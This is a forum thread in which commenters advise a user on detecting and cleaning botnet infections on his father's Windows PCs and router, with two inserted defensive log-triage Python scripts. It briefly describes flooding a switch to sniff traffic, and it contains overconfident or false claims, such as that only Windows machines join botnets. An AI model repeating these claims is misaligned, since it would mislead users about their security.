How Can I Tell If My Computer Is Part of a Botnet?
ashraya writes "My father (not too computer literate) has a desktop and a laptop both running Windows in his network back in Hyderabad, India. I set up a Linksys router for him to use with his broadband service. For some reason, he reset the config on the Linksys, and connected it up without wireless security, and also with the default admin password for some time. As you would expect, both of the Windows computers got 'slow,' and the desktop stopped connecting to the internet completely for some reason. As I logged in remotely to 'fix' things, I noticed on the Linksys' log that the laptop was making seemingly random connections to high-numbered ports on various IPs. I did an nslookup on the IPs to see that they were all either in Canada or US, with Comcast and other ISP addresses. Is that a sign that the computers were in a botnet? Are the other hosts part of the botnet too? (I have since rebuilt the Windows hosts, and these connections are not happening now. I have also secured the Linksys.)"
Well, the only foolproof way that I can envision is the following:
1) Plug your father's computer into a HUB (not a switch, unless it has a special port for this usage)
2) Plug the router into this HUB
3) Plug a Linux machine into the HUB and use tcpdump to examine traffic.
This is what security experts do.
Everything I write is lies, read between the lines.
As you would expect, both of the Windows computers got 'slow', and the desktop stopped connecting to the internet completely for some reason. As I logged in remotely to 'fix' things ...
Quick question, how did you log into his desktop remotely if it "stopped connecting to the internet completely for some reason?"
If all you did was reset the hosts file, it will be back sometime. Somewhere, probably in multiple places on that hard drive, is an executable waiting to be run. It's probably infected some inane looking routine Windows system file that occasionally runs and when that happens your host file will magically change again.
I could recommend you do a netstat but what's the point? Any botnet today would know how to elude that or run as part of a system routine. If the bot is serious enough, your best bet might be to save the data and just do a routine re-install. You know, on my parents' WinXP machine, I do that every time I'm home for Christmas. Then I patch it as far as I can over their 56k modem.
Odds are high your dad's machine is still infected and I would also suspect your machine as being potentially compromised if you connected using Windows remote desktop. Call me overly cautious but I don't take chances with Windows.
You can run all the programs you want (BotHunter, Symantec, AVG, AdAware, etc.) but in the end there's no guarantee, although BotHunter's probably your best bet.
The best thing to do is educate your dad. If he has a valid copy of Windows, spend time with him to show him how to go to IE and click Tools -> Update Windows then select all updates. Remind him periodically when you talk to him--especially if he does any banking or commerce online!
My work here is dung.
They're likely FUBAR. Burn your dad a Windows CD...
If your OS is OSX, linux, or some other variant of UNIX... you're not part of a botnet.
If your OS is Windows... you're hosed.
Look at the activity lights on whatever you have for networking equipment. If the activity lights go ape after the system comes up, and stay that way, back up what's safe and reload it.
I work for the Department of Redundancy Department.
Overseeing a small office LAN, I've come to the conclusion that you will be infected whether you like it or not, regardless of how much you threaten users. I've resorted to using a drive image (Paragon) saved on a drive partition which saves the system in an uninfected state. As soon as a user goes 'uh oh' or complains of slowness I restore the image (keep in mind data is stored on a server which is backed up and scanned, on which no apps are allowed to run). I also run a combination of CCleaner, Spybot S&D and Windows Defender.
In addition I check the network once a week for mail or ftp sockets (evidence there is a botnet at work). So far this has been the easiest way to stay on top.
I LOLed
...or your dad is downloading stuff from a p2p network....
Close all programs
c:\>netstat -b
Love many, trust a few, do harm to none.
Fire up a command prompt and type
netstat -a | find "LISTENING"
to find out what ports your system is listening on. Running the netstat command will give you all the traffic. It should give you a good idea as to what is happening. (It helps to close all of your 'normal' apps.)
+++ UGUCAUCGUAUUUCU
If I had that kind of suspicion, and if it was the router itself I was suspicious about, I would simply get the latest stable firmware for that particular model (be careful) and simply reinstall it on the router itself. It would be something like "format and install Windows". I wouldn't really back up any settings in that case. Just make sure you know the ISP login and password. Make sure they work and they haven't been changed at any point, or you will end up speaking with Bangalore at 4 AM :)
A simple, fast port scanner exists at http://www.grc.com/ (Shields Up!) which really works; ignore Mr. Gibson's weirdly named inventions like "nano scan" etc. What I know is, it works. Oh, also ignore its port 139 or "you aren't stealth" paranoia. 139 is a client port and stealth would be good, but you won't really die if you have nothing served.
For clients, don't reinvent the wheel. NMAP is there, free, and can run under win32 if you need it. http://nmap.org/download.html , some instructions exist for detecting current security threats but I didn't really check since it is all OS X here; we have different issues than win32.
It's just Computrace.. Don't worry -- it will come back on its own.
What it really means is that your dad is a part of an international crime ring and he really is a cracker, without your knowledge. He just felt that you did not have a clue so allowed you to play with his computer.
I prefer the "u" in honour as it seems to be missing these days.
I think he's using the term "hosts" in a different fashion than you are thinking he is. "Hosts" as in servers rather than "hosts" as in a hosts file. I could be wrong, though.
Boot into safe mode, then use a tool such as Autoruns by Sysinternals to see what's starting when Windows loads.
On an infected system you will see a number of drivers and shell extensions that are not a part of a standard Windows installation. Some of them may be things that were installed by the user, but most of them are malicious software.
Of course, getting rid of that stuff is an entirely different question.
The saddest poem
Well you can join BOINC to donate your left over cpu cycles.
You can join a botnet to donate your left over bandwidth.
It's only nice.
Doesn't work in XP.
C> netstat -a | find "LISTENING" [ENTER]
Response: NETSTAT is not recognized as an internal or external command, operable program or batch file.
On boot it says "Welcome to Microsoft Windows"
I would also suspect your machine as being potentially compromised if you connected using Windows remote desktop
Citation needed.
It's either going to be a running process with startup entries and visible exe or DLL or whatever files, and then it's simple to find, or it's going to be hiding itself somehow. In the second case, use Rootkit Revealer. It's free and basically 100% heuristic with no definitions file at all. It just looks for inconsistencies between the registry and file system or something like that. I don't think any rootkits can hide from that.
Google's Super Secret Search Algorithm: SELECT @search_results FROM internet WHERE @search_results = 'good'
Most low-end switches will *become* hubs when you start shoving enough traffic through them that they can't queue it anymore. Fill up the ARP tables with crap really rapidly while transmitting, and they'll fail into dumb broadcast...
The rubotted tool does a pretty decent job of detecting most botted computers. Have your dad download it here:
http://www.trendsecure.com/portal/en-US/tools/security_tools/rubotted
You could also look for his system on the dronebl:
http://dronebl.org/
Good luck!
Get Autopatcher and update it from a CD BEFORE you connect it to anything.
- - - - - - - - - - -
I am a programmer. I am paid to produce syntax not grammar. Deal with it.
It makes remarks about wanting to try other operating software. It's unusually concerned about antivirus protection. Plug and Play only works with force-feedback devices. It makes unusually long "hand-shakes" with the email server. It accuses you of installing spyware. It asks you to run your network scans in promiscuous mode. It tells you that its mainframe never liked you.
A free lightweight network intrusion detection system for UNIX and Windows (http://www.snort.org/) should be able to detect any anomalous behavior.
Your Dad was just torrenting porn.
I will not be pushed, filed, stamped, indexed, briefed, debriefed or numbered. My life is my own.
In the time it took to scan the PC, check logs, and post this question, you could have restored your PC image and been off and running clean again.
You do make an image of your Windows PC, right? You wipe and reload the image regularly, right?
If you are going to use Windows, treat it like a needle or syringe. They make them cheap and disposable for a reason. Do not reuse. You can reimage in 30 minutes. Do this once a month or more often as needed.
Your monthly Windows Update after the reimage will probably take longer than the reimage.
Build a new image every 6 months or so, and after each service pack, obviously.
spend time with him to show him how to go to IE and click Tools -> Update
Not to be a troll, I was from Hyderabad too.
There is a little chance that this XP is a "genuine" one to allow updates.
-- It is the mark of an educated mind to be able to entertain a thought without accepting it. -- Aristotle
I have seen this happening with a computer running Skype... Is your dad running Skype? Tell him to kill the Skype process in the system tray and see if the problem goes away.
XP Home sp3
Guess it's Borked
While my father was cleaning his gun, he loaded it and emptied the clip into his foot. He then reloaded and pumped another four slugs into the same foot. So I was wondering, does any one know where I can get a good deal on Band-Aids? Thanks.
No folly is more costly than the folly of intolerant idealism. - Winston Churchill
Let me add to your list of cleaning tools. http://www.malwarebytes.org/
And please! For the love of Linux, remove Symantec products from your list.
Format and reinstall, if is the only way to be sure.
If I were God, wouldn't I protect my churches from acts of me?
Aren't all Windows machines part of botnet by default? Microsoft?
For some reason, he reset the config on the Linksys, and connected it up without wireless security, and also with the default admin password for some time.
He probably just stuck a pencil in the reset button. Maybe because he was having connection problems for some other reason and that "fixed" it and he was happy. Ignorance is bliss ... for a while.
Research shows that 67% of those who use the term "research shows", are just making shit up.
Would wireshark work to capture traffic going to the botnet? Isn't it IRC traffic so you could just sort by that traffic type?
One word:
malwarebytes
Detecting and removing botnet software is its purpose in life.
http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html?tag=mncol
And as you tread the halls of sanity, You feel so glad to be, Unable to go beyond. I have a message, From another time..
He is in the hub of all Computer tech support nowadays - why are you asking the rest of the world - get someone local to fix it.
For a suspicion? Good luck with that.
A good many replies here - so I will answer a few questions that have been asked.
1. For this time, I assumed the systems were owned, and they have now been rebuilt (Windows reinstalled).
2. The Linksys is re-secured - but I hadn't thought of that being owned - so I now have to do a firmware upgrade on that - thanks for the suggestion.
3. Other suggestions are to confirm the botnet or sniff traffic - I am in the UK, and I can only do so much remotely.
4. One of the questions was how I managed to remote into the Windows hosts - No, I managed to remote into the Linksys, not the Windows hosts.
5. The bizarre situation in the Windows host before it was rebuilt was that if we did (I told the commands over the phone for my dad to execute) ping or traceroute to a destination like www.google.co.in, it would work. It would resolve the right IP. However, with any of the browsers, as soon as access to a site was attempted, we would get a message "Connection Reset" or the browser's equivalent. (Firefox, Chrome and IE tried.) Has anyone seen that one before?
6. Another question asked was if the Windows in question was legit - Yes, I bought him an OEM XP the last time I was there and installed it.
Regards,
Ashraya
I remember from my Sun Solaris 8 network or sys admin class that they said the system will automatically configure itself as a gateway between two network cards. When my son gets old enough to start surfing on his own, it's what I intend to do. I've got an old Solaris 8 machine on an Ultra 10. I can put it out in the garage (next to the cable modem) and have it be a physical hop between the cable modem and Dual Band WiFi router.
Running Wireshark on the computer that might be infected is useless. Really nasty malware has the ability to hide its traffic even from packet sniffers on the local host. I find the best bang for the buck is using a passive network tap and plugging a sniffer into that. Now, no need to go out and buy one as that will be expensive; you can build one ($18). http://www.instructables.com/id/Make_a_Passive_Network_Tap/ If you want to one-up this then get a PC and install a network-based Intrusion Detection System (IDS); google Snort. It'll look for abnormal network traffic patterns, and you can even configure it to notify you if it does detect something. Also, take that Linksys router and install DD-WRT on it and configure the firewall to block everything except what you know to be okay. Note: you can disable the reset button in DD-WRT =)
Wipe out the disk completely, and reinstall Windows.
If you want to do an analysis later, make an image of the disk before wiping it.
Run the image in an isolated network, where you can watch what's going on on the wire, but you are not causing harm to other computers.
Slashdot is doing tech-support for India now?
Some chick named Alanis is calling you subby.
Q: How do I tell if my computer is part of a botnet?
A: If it's got Windows on it, it is.
Use wireshark to hunt down your network from your router or via airtun (in aircrack) to scan the network from a computer.
Is it running windows?
If you are seeing NetBIOS over TCP (port 445) traffic and he is not uploading/downloading files via the "My Network Places" interface, he is most likely infected with a trojan.
If you're seeing random high port to random high port traffic (ports 1024-65535 connecting to other ports 1024-65535) and he isn't doing P2P, then he most likely is infected and the infection is trying to set up the machine as part of a botnet and trying to infect others.
If you are seeing UDP traffic on a consistent port on his machine to random high ports (1024-65535) on the outside, his machine is an active server in a botnet.
Having to work for a living is the root of all evil.
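The three traffic rules in the post above (outbound 445, high-port to high-port TCP, and UDP from one fixed local port fanning out to many random high ports) can be applied mechanically to a router's outbound connection log. This is an added example, not code from the original thread; the log format and the addresses in it are constructed, and the fan-out threshold is an assumption. It also carries the caveat raised elsewhere in the thread: high-to-high traffic is equally consistent with P2P or a VoIP client such as Skype.

```python
"""Classify per-host outbound connections from a home router log using the
three heuristics from the post above. Added example; the log line format
below is constructed and is not a real Linksys log format."""
import re
from collections import defaultdict

HIGH = range(1024, 65536)  # "high" ports as defined in the post

# Constructed format: "<TCP|UDP> <src ip>:<src port> -> <dst ip>:<dst port>"
LINE_RE = re.compile(
    r"^(?P<proto>TCP|UDP)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample log: .101 looks like P2P/bot fan-out, .102 probes SMB.
SAMPLE_LOG = """\
TCP 192.168.1.101:3341 -> 68.87.10.12:44123
TCP 192.168.1.101:3342 -> 24.12.33.9:51234
TCP 192.168.1.101:3343 -> 76.102.4.77:6881
TCP 192.168.1.101:3344 -> 24.12.33.9:80
UDP 192.168.1.101:4672 -> 68.87.10.12:17325
UDP 192.168.1.101:4672 -> 24.12.33.9:28811
UDP 192.168.1.101:4672 -> 76.102.4.77:39000
UDP 192.168.1.101:4672 -> 99.23.1.5:41000
UDP 192.168.1.101:4672 -> 67.160.8.8:52019
UDP 192.168.1.101:4672 -> 71.56.9.10:60001
UDP 192.168.1.101:1027 -> 208.67.222.222:53
TCP 192.168.1.102:1035 -> 74.125.45.100:80
TCP 192.168.1.102:1036 -> 68.87.10.12:445
TCP 192.168.1.102:1037 -> 24.12.33.9:445
TCP 192.168.1.102:1038 -> 76.102.4.77:445
this line is not a connection record and is skipped
"""


def parse_log(text):
    """Return (proto, src, sport, dst, dport) tuples; unknown lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append((m["proto"], m["src"], int(m["sport"]),
                            m["dst"], int(m["dport"])))
    return records


def classify_host(records, udp_fanout_threshold=5):
    """Apply the three rules to one internal host's outbound records."""
    smb = sum(1 for p, _, _, _, dp in records if p == "TCP" and dp == 445)
    high_high = sum(1 for p, _, sp, _, dp in records
                    if p == "TCP" and sp in HIGH and dp in HIGH)
    # Rule 3: one fixed local UDP port talking to many distinct remote high ports.
    udp_remotes = defaultdict(set)
    for p, _, sp, d, dp in records:
        if p == "UDP" and dp in HIGH:
            udp_remotes[sp].add((d, dp))
    udp_fanout = {sp: len(r) for sp, r in udp_remotes.items()
                  if len(r) >= udp_fanout_threshold}  # threshold is an assumption

    findings = []
    if smb:
        findings.append("smb_445_outbound")
    if high_high:
        # Same pattern as BitTorrent/Skype: confirm no P2P or VoIP client first.
        findings.append("high_to_high_tcp")
    if udp_fanout:
        findings.append("udp_fixed_local_port_fanout")
    return {"connections": len(records), "smb_445": smb,
            "high_to_high": high_high, "udp_fanout": udp_fanout,
            "findings": findings}


def classify_log(text):
    """Group records by internal source host and classify each host."""
    by_host = defaultdict(list)
    for rec in parse_log(text):
        by_host[rec[1]].append(rec)
    return {host: classify_host(recs) for host, recs in by_host.items()}


if __name__ == "__main__":
    for host, result in sorted(classify_log(SAMPLE_LOG).items()):
        print(host, result["findings"])
```

A host flagged only by the high-to-high rule still needs the P2P/VoIP question answered before it is treated as a bot; the other two rules are the stronger signals.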
You've rebuilt the Windows machines? So, now you cannot at all be sure if they were part of a botnet or not.
Chances are they were, and you've done the right thing by rebuilding them.
I think the details about the router with its default password and no wireless security are a red herring - I've not heard of a botnet that tries to get into your network by guessing standard admin passwords for common wireless routers. More likely it was a drive-by download from a dodgy web page, or a trojan in some downloaded software that put the malware on the machines.
Specialist Mac support for creative pros, Melbourne
If you are running Windows, you are part of a botnet. If you are running a real operating system, your system is clean. Simple, huh?
Buy Text Processing in Python
+1 Flamebait
This worked for me: Take a really sharp knife and carefully scrape away the insulation on a section of the wires between your computer and the router. I like to take some duct tape and make a closed loop with the sticky side out. I stick one side of the loop to a flat surface and then stick my wires to the exposed sticky side. This does a pretty good job of keeping the wires secure. You'll then need to develop a quark microscope capable of recording video (I had one but I misplaced it when I moved out of my old apartment). Aim the scope at the exposed wires and hit the record button (mine was red). Type out an email containing every possible character and send it through the wire as your control case. Use this data to translate the electron patterns in the video into discernable information. Monitor the video for several hours. If you see the word "girth" in any outgoing data, you can be pretty sure you've got yourself a bonafide (no pun intended) botnet. If you find a botnet in your system, all you need to do is cut the exposed wires and it won't be able to talk to the internets anymore.
In today's world your dad's systems are owned!
I have fought enough with MS systems to know, just nuke it and start over... I think Microsoft should start naming their Operating Systems starting with Swiss Cheese Business, or better yet Ben Dover Professional!
Ugh....
My own Linksys router reverts to wireless network enabled, and without security. All it takes is the power to go out, and back on again, and Boom! You're wide open. Furthermore, Linksys never offered a patch or recall or anything later; they accept this is OK.
(If at first you don't succeed, do it different next time!)
> I noticed on the Linksys' log that the laptop was making seemingly random connections to high-numbered ports on various IPs.
There is probably more than 1 thing going on here.
The machines are probably hacked. If they are, they will have some kind of a control channel. However, C&C is frequently subtle and hard to spot.
The behavior you describe is typical of a number of P2P VOIP applications. Skype is the most likely alternative.
If it is Skype, your chance of compromise is actually increased. I have observed attackers gathering lists of Skype peers (and BitTorrent peers as well). They appear to believe that these lists provide a fruitful source of vulnerability for further attack.
Miles
Not if you run it from a LiveCD on a dedicated system that you have set up with a bridge like the post above.
I noticed on the Linksys' log that the laptop was making seemingly random connections to high-numbered ports on various IPs. I did an nslookup on the IPs to see that they were all either in Canada or US, with Comcast and other ISP addresses
Hey dad, you see that donkey icon in the system tray, next to the time ? Now right click on it and choose "Quit".
I see a lot of switch/gateway logs with connections like you describe. 85-90% of the time it is actually BitTorrent/Limewire/other forms of P2P traffic.
Sounds like Dad, if that's even his real name, knows more about computers than he is pretending to.
He is clearly torrenting, and your best course of action would be to report his nefarious actions to the authorities.
While we are on a topic of security:
Several months ago I started using Debian as my primary OS at home. I am very happy with it, but don't know much about how to keep it secure or how to tell if I had been compromised. Of course very basics are clear: I do not use root except in those instances of updates, etc. The consensus on this site is that if you run Linux then you are invincible, but I respectfully disagree. The system is only as secure as the competence of the user.
To cut the long story short:
- What do you normally do to make sure that your Linux system is clean? Is running apt-get upgrade regularly enough or is there more to it?
- What articles or books would you recommend to a newbie in this area? I am fully willing to RTFM as such, but please at least give me at least some direction on what to search for.
- Any other general tips, advice or wisdom would you be willing to share?
Thank you
As it's booting, if you see a logo that reminds you of Simon at all, chances are it's enslaved in a bot net. Daaamnnn yooouuuu Hasssbrooooo!!!!!
Admit it. You post strawman arguments as AC so you get modded Insightful for refuting them, rather than Troll
Is to sit down with your father and gently explain to him the perils of surfing the internet unprotected. Had he done that I am sure that this wouldn't have happened in the first place. Not to mention that fortunately this was simply an infection that could be cured. Your father should be thankful that there is no pregnancy involved. Something to keep in mind for the next time he is out sowing his wild oats.
I have mod points and I am not afraid to use them.
...also throw in SuperAntiSpyware, AdAware, and Process Explorer. I've found 5 unknown viruses with Process Explorer in the last 4 months, and 3 probably unknown just yesterday.
Your father's computer could also have had spam smtp engines installed and controlled by a botnet. Honestly, I would try and steer your father to using Ubuntu or Linux Mint which is a much more secure computing platform than Windows. You could install and configure it for him. Basically, your dad probably uses the computer for basic office stuff and email so a Linux distro would be better for him. He would have to worry less about a botnet infection.
It comes with a logo; looks like a window. :)
--- For a good time mail uce@ftc.gov
Ever heard of Wireshark?
if you run windoze you are anyway in one or another botnet. the only difference between them is the fact that you got to pay for some of them while others are free :-). by the way: why are you so worried about being part of a botnet? if you're a windoze user that's the best thing that can possibly happen to you. for example do i tend to remove all other malware from the machines that are in the botnet i administer. i really try to get them as secure and stealthy as possible. just give me your ip address and i will show you what i mean (free of charge of course!).
...so I downloaded the Bothunter executable only to discover that it did not have a valid digital signature. WTF? A security program that's not authenticatable?
If you are going to fart around that much, you might as well build a new install CD with SP3 slipstreamed in and the most recent hotfixes set to run on install:
http://www.nliteos.com/guide/part1.html
I have built such a CD from the I386 folder on my harddrive (my laptop came with a recovery partition, not a CD) and successfully installed it into a virtual machine.
Nerd rage is the funniest rage.
Right?
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
If the bogus netstat (and other utilities) are already part of the rootkit the skript ciddey downloaded, it doesn't cost the skript ciddey any more effort, and is even less likely to be noticed than strange output in netstat.
Tell your dad to stop browsing for American porno.
Maybe you already know, but if you don't, you should look up "Slip Streaming". With "Slip Streaming" you copy your install CD to your harddrive, "Slip Stream" the Service Pack files in, then create an install CD that will at least install the most recent Service Packs. Saves from having to go through all the old Service Packs on reinstalls.
He did say he has since rebuilt the machines, whatever he might have meant by that.
Also, the way I read it, he was saying he'd logged into the router/modem. (Which was probably also compromised, but at least he wouldn't be sharing desktops with it.)
First, many bot kits now are lower profile, deliberately not taking all the bandwidth available. That's going to reduce activity on the idiot lights.
Second, the odds that the modem/router was itself also compromised are not small, and many of the cheap ones feed the idiot lights through software. (Do I need to say more about that?)
> How would a video file deliver a virus payload?
...via a trojan in the video file's drm protection layer as far as i can make out.
although to date this only seems to apply to .wmv files (thanks microsoft). the issue was originally reported in 2005, so i don't know whether it's very common, or indeed if it's still an issue nowadays.
for more info see here:-
http://seclists.org/bugtraq/2005/Jan/0130.html
Or are you talking about the known good machine which he brought with him, running (preferably a stripped down Linux or BSD) in stealth/promiscuous mode?
Rootkits these days even muck around with the BIOS.
Safe mode isn't safe any more. It hasn't been for quite a while.
Be safe, wipe windows.
There's no positive way to determine whether a machine is clean after an infection. If you even suspect infection, wipe and start over.
Or just give him a 'Live Ubuntu CDROM' to boot and run for online use. He'll be safer than 99.99999999% of the internet users.
Next time power goes down, the Linksys is going to be reset.
Do you guys remember when John Carmack used to post here? Now look at this place. AOL news is more tech-savvy. Ugh.
As you would expect, both of the Windows computers got 'slow', and the desktop stopped connecting to the internet completely for some reason. As I logged in remotely to 'fix' things ...
Quick question, how did you log into his desktop remotely if it "stopped connecting to the internet completely for some reason?"
When you combine "noticed on the Linksys' log" with "As I logged in remotely" and combine that with the fact that the machines don't have internet access you can assume that he logged into the router remotely and not the PCs in question.
-----
If all you did was reset the hosts file, it will be back sometime. Somewhere, probably in multiple places on that hard drive, is an executable waiting to be run. It's probably infected some inane looking routine Windows system file that occasionally runs and when that happens your host file will magically change again.
I'm guessing that you assume he just reset the hosts file because he used the word 'hosts' and didn't put it into context that a) there are 2 machines that are being discussed, and b) he used the word rebuilt, which implies a clean install or reassembling (the software). So, the statement "rebuilt the Windows hosts" more than likely is referring to the two computers and not the hosts file itself.
I could recommend you do a netstat but what's the point? Any botnet today would know how to elude that or run as part of a system routine. If the bot is serious enough, your best bet might be to save the data and just do a routine re-install. You know on my parent's WinXP machine, I do that everytime I'm home for christmas. Then I patch it as far as I can over their 56k modem.
-----
He is clearly capable of verifying the network activity of these machines outside of Windows as his entire suspicion is coming from the Linksys firewall log entries to A LOT of IP addresses and odd ports:
As I logged in remotely to 'fix' things, I noticed on the Linksys' log that the laptop was making seemingly random connections to high-numbered ports on various IPs
Odds are high your dad's machine is still infected and I would also suspect your machine as being potentially compromised if you connected using Windows remote desktop. Call me overly cautious but I don't take chances with Windows.
Odds are a funny thing but IMNSHO I must firmly disagree with you. Your suspected actions (of resetting the hosts file in Windows) should not have eliminated the behavior he was seeing. Modifying the hosts file isn't necessary at all to connect to a botnet. You do all of that via IP (or a legitimate lookup). Now, spyware will change the hosts file because it would benefit from maliciously redirecting the user's requests. If you are operating autonomously then you have no need to make that change.
-----
You can run all the programs you want (Bothunter, Symantic, AVG, AdAware, etc.) but in the end there's no guarantee although BotHunter's probably your best bet.
The best thing to do is educate your dad. If he has a valid copy of Windows, spend time with him to show him how to go to IE and click Tools -> Update Windows then select all updates. Remind him periodically when you talk to him--especially if he does any banking or commerce online!
Defense in depth has never been more important. This advice is great but it doesn't go far enough. At minimum:
- A self-updating antivirus package (or two, but only one with real-time scanning)
- A regularly scheduled scan (of AV (again, even with two as nothing can nor will ever be perfect) and malware)
- Automatic Windows updates (because otherwise they'll never do it)
- A monthly scan with Secunia's Personal Software Inspector to update all of your other applications
Some other advic
When your computer comes alive and starts sending messages to Megatron, then you will know.
and the kneejerk reaction is not as valid as it once was, but have you tried talking him into giving up MSWindows?
I know, I know, easier said than done, and, these days, even Linux and BSD are having a hard time staying clean. (I'm sure that costs Billy G. a small donation or two a week. Sorry. You didn't want to hear that, either. I didn't say it.)
That modem/router is going to get reset again, hit by power or something. Depending on which model you're using, you can install a small Linux or net/openBSD distribution and reconstruct it so you can keep him from resetting it. Or maybe get a low-power PPC or ARM based NAS-type box (like the Kurobako), add disk drive and necessary ports (not sure what you'll need to hook to the WAN in India) to replace it and keep it more under your control.
As advice, it's good. Financially, and time-wise, I'm not able to do it in my house, yet. But it's something we all really need to start doing. Relying on ISPs who have do not have great incentive to help customers keep their kit clean is not a good idea.
If I had a couple of million in capital, I'd take a break and see what kind of packaged solution I could put together and sell -- very small ARM or coldfire processor as a tripwire watchdog, a medium-sized ARM with a small notebook or flash drive for meaningful logs as the firewall/router.
For my purposes, I'd have another ARM processor with a small notebook drive serving DNS on the inside of the LAN. (Stupid ISP is telling me to change my DNS setting to DHCP, so I want to start checking their DNS server against a third-party DNS server.) and another for serving timestamps, and another serving my personal website. And all of these could fit in one small physical box, really.
"netstat -a | find "LISTENING"" - by (H)elix1 (231155) on Thursday August 06, @05:08PM (#28978877)
Good idea, & I tend to use THIS commandline though:
netstat -an
OR
netstat -ano
Which will show ALL listening endpoints, inclusive of local ports and remote ones...
NOW, my point here? Don't trust netstat alone... because, like ANY application, it can be messaged or hooked (like what you see quite a few malwares nowadays do) to supply erroneous OR incomplete data...
Thus, I recommend some other tools, to supplement & doublecheck it: Those tools being -> TcpView from SysInternals (Dr. Mark Russinovich & Bryce Cogswell, & Microsoft owns them now)...
Another EXTREMELY USEFUL TOOL that sysinternals has, for the purposes of determining IF you are running ANY "weird programs", is their Process Explorer tool!
Process Explorer - it has several advantages over Windows' own native taskmanager, in that it can "break out" subordinate process lists under svchost.exe (what brokers libs/dlls run under it for various system services)... &, since many a malware today attempts to exploit that to hide from std. TaskManager? This program CAN "expose them", if they attempt to hide under svchost.exe... & then, it can also be extremely useful in DESTROYING said malware/botnet control executables as well (more on that in my P.S. below, as to details of the "how" of it, pretty easy to do).
APK
P.S.=> Process Explorer can produce a DLL View listing of a process' own subordinate libs/dlls called or other exe's brokered by it (after you use Process Explorer's VIEW menu, & Show Lower Pane submenu, + choose the Lower Pane View submenu option)...
Then, once that's in place, start highlighting processes to examine in its left-hand side list pane... & once there, start looking @ the DLL view list pane below, & if you see ANY that you are not familiar with?
You then search them online & most times, many of the "malware libs" & exe's are already known & you can simply "Freeze" (suspend) the parent process (halting it temporarily, doubtless via messaging it with HLT instructions or otherwise similar calls) & then, suspend said lib being used for malware control!
Lastly/Finally, delete said bogus lib/dll or exe on disk (this is done because many/most times, when a lib's being called this way, it is not possible to otherwise delete said backing lib or exe file from disk, because executables "page back" to themselves upon pagefaulting, & when in use this way? They cannot be destroyed typically.)... apk
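As an added example that is not part of the thread, here is a small Python script that triages a saved `netstat -ano` listing the way the post above suggests: it lists listeners you would not expect on a stock workstation, lists established connections to high-numbered remote ports (the pattern the router log showed), and names the PIDs that do both, which are the ones to open in TcpView or Process Explorer. The netstat capture, the PID-to-image map (as `tasklist` would give it), the expected-listener set and the common-port set are all constructed for illustration and are not from any real host.

```python
"""Triage a `netstat -ano` capture for unexpected listeners and for outbound
connections to high-numbered remote ports.  Added example; the capture and the
PID-to-process map below are constructed, not taken from a real machine."""
from collections import defaultdict

# Constructed sample of `netstat -ano` output from a hypothetical Windows host.
NETSTAT_OUTPUT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       876
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:6667           0.0.0.0:0              LISTENING       1552
  TCP    192.168.1.101:1043     203.0.113.10:80        ESTABLISHED     2212
  TCP    192.168.1.101:1044     198.51.100.23:34521    ESTABLISHED     1552
  TCP    192.168.1.101:1045     198.51.100.77:51233    ESTABLISHED     1552
  UDP    0.0.0.0:137            *:*                                    4
  UDP    192.168.1.101:3074     *:*                                    1552
"""

# Constructed PID -> image name map, as `tasklist` would report it.
PID_NAMES = {4: "System", 876: "svchost.exe", 1552: "svchost.exe", 2212: "iexplore.exe"}

# Listeners a stock Windows workstation is expected to have (assumption for the example).
EXPECTED_LISTENERS = {("TCP", 135), ("TCP", 139), ("TCP", 445),
                      ("UDP", 137), ("UDP", 138), ("UDP", 1900)}
# Remote ports that carry most legitimate home traffic (assumption for the example).
COMMON_REMOTE_PORTS = {25, 53, 80, 110, 143, 443, 993, 995}


def _split_endpoint(endpoint):
    """'192.168.1.101:1044' -> ('192.168.1.101', 1044); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Turn the netstat listing into a list of row dicts; UDP rows have no State column."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue  # banner, column header or blank line
        proto, local, foreign = parts[0], parts[1], parts[2]
        state = parts[3] if len(parts) == 5 else ""
        lhost, lport = _split_endpoint(local)
        fhost, fport = _split_endpoint(foreign)
        rows.append({"proto": proto, "lhost": lhost, "lport": lport,
                     "fhost": fhost, "fport": fport, "state": state,
                     "pid": int(parts[-1])})
    return rows


def unexpected_listeners(rows):
    """Listening TCP sockets and bound UDP sockets outside the expected set."""
    return [r for r in rows
            if (r["state"] == "LISTENING" or r["proto"] == "UDP")
            and (r["proto"], r["lport"]) not in EXPECTED_LISTENERS]


def high_port_connections(rows):
    """Established connections whose remote port is ephemeral-range and not a common service."""
    return [r for r in rows
            if r["state"] == "ESTABLISHED" and r["fport"] is not None
            and r["fport"] >= 1024 and r["fport"] not in COMMON_REMOTE_PORTS]


def suspicious_pids(rows, pid_names):
    """PIDs that both open an unexpected listener and talk to high remote ports.
    These are the processes to inspect in Process Explorer's DLL view."""
    listeners = {r["pid"] for r in unexpected_listeners(rows)}
    outbound = defaultdict(int)
    for r in high_port_connections(rows):
        outbound[r["pid"]] += 1
    return {pid: {"name": pid_names.get(pid, "?"), "outbound": n}
            for pid, n in outbound.items() if pid in listeners}


if __name__ == "__main__":
    rows = parse_netstat(NETSTAT_OUTPUT)
    for r in unexpected_listeners(rows):
        print(f"unexpected listener {r['proto']}/{r['lport']} pid {r['pid']} ({PID_NAMES.get(r['pid'], '?')})")
    for r in high_port_connections(rows):
        print(f"outbound to {r['fhost']}:{r['fport']} from pid {r['pid']}")
    print("examine:", suspicious_pids(rows, PID_NAMES))
```

In the constructed sample the flagged PID shows up as `svchost.exe`, which is exactly the case the post makes for Process Explorer: the image name alone tells you nothing, so the next step is the DLL view for that PID. Remember the post's own caveat that netstat can be hooked; a listing that looks clean is not proof of anything, which is why the cross-check with TcpView (or a capture taken off-host, as other posters suggest) matters.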
Is it running Windows? Then it's part of a botnet.
---- Booth was a patriot ----
your computer wouldn't have failed you as it has.
I've read this entire thread and learned that it's impossible to tell if your computer is part of a botnet.
--I'm so big, my sig has its own sig.
